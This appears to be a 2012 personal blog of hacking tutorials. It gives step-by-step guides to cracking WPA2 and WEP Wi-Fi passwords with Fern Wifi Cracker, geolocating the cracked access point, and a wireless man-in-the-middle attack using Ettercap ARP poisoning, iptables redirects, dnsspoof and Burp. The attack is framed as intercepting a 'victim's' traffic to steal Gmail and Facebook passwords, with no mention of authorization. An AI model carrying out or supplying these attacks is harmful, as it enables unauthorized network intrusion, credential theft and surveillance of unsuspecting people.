Wednesday, September 12, 2012

[TUT] WPA2 CCMP Cracking using Fern Wifi Cracker [TUT]


hey guys !!
day before yesterday i made a tutorial on WEP cracking using a build-in tool called "fern wifi cracker"...

today i'll show you how to crack WPA2 CCMP using the same tool...


so now let us begin..

open fern wifi cracker...


select the wireless interface from the list.




when you select your card, a window will open ...ignore it... just to OK



double click anywhere on the tool to get the settings... and then enable the xterm from there... (the window appeared above was just informing you about the "settings" ) 





now click on the button with the wifi logo on it, the scanning will start when you click it..


now you will be able to see the xterms running WEP & WPA scanning (its using airodump)


*in the pic i actually closed the xterm for wep..





now click on the button which says "WPA"..when you do that, a window will open..just click the AP from the List and then select a wordlist for the WPA2 CCMP cracking (dictionary attack)
select a client which you want to disconnect (deauth) from the AP through the list.


and now run "Attack"











after few seconds (or minutes) you can see one xterm appering which is sniffing the AP (actually waiting for the WPA handshake) and another xterm appearing for every 3-4 seconds (this xterm is trying to deauthenticate the client by sending the "Deauth" packet)





now when you get the WPA-handshake, the tool will start the dictionary attack automatically and if the password is there in the wordlist then it will be displayed on the window..




ok this is it for WPA2 CCMP cracking... i hope you liked it... 


Monday, September 10, 2012

[TUT] WEP cracking using fern-wifi-cracker in bt5 r3 [TUT]


hey guys...

today i tried a new tool on Backtrack 5 R3 ... its called "fern-wifi-cracker
this tool is really good...so i thought i should make a tut on this...

so lets begin ...

go to backtrack --> exploitation tools --> wireless exploitation tools --> WLAN exploitation --> fern-wifi-cracker




now select the wireless interface you have ( it can be wlan0, wlan1 etc..)





now there's a button on which you can see wifi logo, click that and it will start the network scanning ( of-course its using airodump here).

*note: if you double-click anywhere in the tool, you'll get a "settings" dialog box... you can set the channel there and also you can start the xterm.





Now if you see closely, you'll note that the two buttons below the scan button will get enabled, the first button is the WEP cracking button and the second one is for WPA cracking.

click the button for WEP cracking 





after clicking that button, a new dialog box will open. you can select the wep network from the list and then you can select the type of attack i.e arp replay attack, chop-chop attack or fragmentation attack. then click "Attack"...







you'll be able to see the number of ivs are increasing. there's a progress bar at the end of the dialog box. when the progress bar reaches the end, this tool starts aircrack for cracking wifi password.






when the password is cracked, it will be shown at the bottom of the dialog box...

NOW COMES THE INTERESTING PART: 
(before going further, i suggest you to connect to the internet for this)

go to "toolbox" --> Geolocatory tracker.






give the bssid of the AP in the text box and click "Trace".






i think everyone has already guessed what it will show...

YES... INDEED... IT WILL SHOW YOU THE LOCATION OF THE AP ON THE GOOGLE MAPS ... you can see the coordinates as well..






and also you can see in the toolbox, there's a button for cookie hijacking called "cookie hijacker" ..

ok guys so that's it for now... :-)

PM me if you need any help in this :)

Friday, June 29, 2012

WIRELESS MITM ATTACK (INTERCEPTING THE DATA)


In this tutorial i'll show how can you intercept the data when the victim is communicating ....


ok but before we get started there are certain requirements which is necessarily:

1)     Backtrack 5 R2 (am using R2 , if you have R1 then no problem ) :-)
2)     Connection with the victim's Wireless Network 


TOOLS WHICH ARE USED IN THE PROCESS:


1)  Ettercap
2)  Burpsuite 

For those who didnt cracked the wireless password of the victim, i suggest you to first read the cracking tutorial and then this.
i can suggest you some tools (good) for wireless cracking:

1)  Airecrack Tool
2)  Gerix-wifi-Cracker Tool
3)  Airoscript Tool


ALL THREE ARE INTEGRATED WITH BACKTRACK 5 R2


SO LETS GET STARTED !!



STEP 1

we have to configure the ettercap.conf file before starting the ettercap...why? because by-default ettercap will not sniff on "wlan0" interface.
so to configure the file, go to terminal and type this
vim /etc/etter.conf 

now keep scrolling down until you find this code:
#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rp$
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %r$

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRE$
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIR$


change it to :

#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rp$
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %r$

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRE$
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIR$


save & close it.



STEP 2
(If you guys already know how to do a normal MITM then skip this step)
start ettercap



goto SNIFF-->UNIFIED SNIFFING



select N/W Interface ---> wlan0 --> OK



(wlan0 is my wireless interface. check yours and then add.)


HOSTS --> SCAN FOR HOSTS


HOSTS --> HOSTS LIST 


        Select the Victim's IP and click "ADD TO TARGET 1" or "ADD TO TARGET 2"



        
MITM --> ARP POISONING ---> (tick on it) SNIFF REMOTE CONNECTION --> OK














MITM --> ICMP REDIRECTS --> (enter your MAC ADDRESS and IP ADDRESS) GATEWAY INFORMATON --> OK





START --> START SNIFFING



To check if the ARP poisoning is successful, 




PLUGINS --> CHK_POISON

If poison successful then move on
else try disconnecting and reconnectiong again or restart ettercap again.

STEP 3 (OPTIONAL)

If you guys want to spoof the dns side by side then type:


 dnsspoof -i wlan0 > /root/Desktop/dns.txt 


(the spoofed dns data will be save to dns.txt located here --> "/root/Desktop/"


FINAL STEP


Start Burpsuite

BACKTRACK --> VULNERABILITY ASSESSMENT --> WEB APPLICATION ASSESSMENT --> WEB APPLICATION PROXIES --> BURPSUITE




goto PROXY --> OPTIONS
now add port number 80 (http) and 443 (https)




goto proxy --> INTERCEPT (click ON) :-)


NOW IF THE VICTIM SURF THE INTERNET, ALL THE QUERIES WILL BE FORWARDED
THROUGH YOU :-)

NOTE: after Intercepting the data and sniffing the password of gmail,facebook, etc.. ALWAYS REMEMBER TO CLICK ON "FORWARD" otherwise the victim 
will not be able to surf i.e his/her browser will be loading only... :D

HAVE FUN !!